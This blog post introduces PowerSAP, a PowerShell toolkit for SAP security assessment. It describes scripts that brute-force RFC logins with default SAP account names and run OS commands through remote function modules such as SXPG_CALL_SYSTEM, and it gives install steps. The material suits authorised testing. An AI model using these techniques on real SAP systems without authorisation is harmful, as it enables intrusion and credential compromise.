PowerSAP: A PowerShell SAP Security Assessment Tool!

This post is about PowerSAP, a tool that was included in this years BlackHat Arsenal. What I like about this tool is that it does not try to re-invent the wheel and yet keeps it’s source code open for all of us to see and understand. The author @_Sn0rkY is upfront about this and mentions this in the tool description itself.

What is PowerSAP?

PowerSAP is an open source tool in PowerShell that helps you perform vulnerability security assessments on SAP installations. The author describes this as a simple PowerShell re-implementation of popular & effective techniques of all public tools such as Bizploit, multiple Metasploit auxiliary modules and Python scripts available on the Internet. Just like Metasploit, this SAP assessment toolkit is a collection of multiple other PowerShell scripts.

Presumably as you must have known by now, it works on Microsoft Windows operating systems and depends on SAP Connector for Microsoft .NET. You must also be aware that these SAP Connectors; which are provided by SAP AG. itself, allow the integration of different applications and technologies with SAP Systems via open standards. In other words, these connectors are a means for technical inter-operability of SAP Components and our projects.

Current PowerSAP features:

PowerSAP provides the following features:

Invoke-mgmt-con-soap.ps1: Recover information and settings through the SAP Management Console SOAP Interface. This it does by connecting to the 50013 TCP port and sending SOAP requests.

Invoke-RFC_PING.ps1: Calls the function module RFC_PING and the build-in function Ping of the .NET connector to perform a Ping test on SAP system.

Invoke-RFC_SYSTEM_INFO.ps1: Calls the function module RFC_SYSTEM_INFO and gets information such as the Kernel Release, Release Status of SAP System, System ID, etc.

Invoke-RFC_bruteforce.ps1: Calls the RFC_PING function module with a list of credentials such as SAP, DDIC, IDEADM, EARLYWATCH, SAPCPIC to perform a brute force attack over SAP RFC protocol.

Invoke-SXPG_CALL_SYSTEM.ps1: Calls the SXPG_CALL_SYSTEM remote function module of a SAP system and performs OS command execution. As of now, only a few predefined SM49 commands are supported.

Invoke-SXPG_STEP_XPG_START.ps1: Calls the SXPG_STEP_XPG_START remote function module of a SAP system and performs OS command execution. As of now, only the whoami command is supported.

In addition to these scripts, the author has also included a Invoke-skeleton.ps1, which you can use as a base for your future custom modules. Pretty decent tool I must say.

Install PowerSAP:

The first step to get PowerSAP to work is to get the SAP Connector for Microsoft .NET. Get it here. Now, pull the tool GIT repository from here. Copy the sapnco.dll & sapnco_utils.dll in their respective NCo_x86/NCo_x64 folders. The setup part is done! You can now run the various tests by “invoking” the scripts from the checked out Standalone folder.

Featured Post

Kali Linux 2019.1 is the latest Kali Linux release. This is the first 2019 release, which comes after Kali Linux 2018.4, that was made available in the month of October. This new release includes all patches, fixes, updates, and improvements since the last release – Kali Linux 2018.3, including a shiny new Linux kernel versionRead more about UPDATE: Kali Linux 2019.1 Release!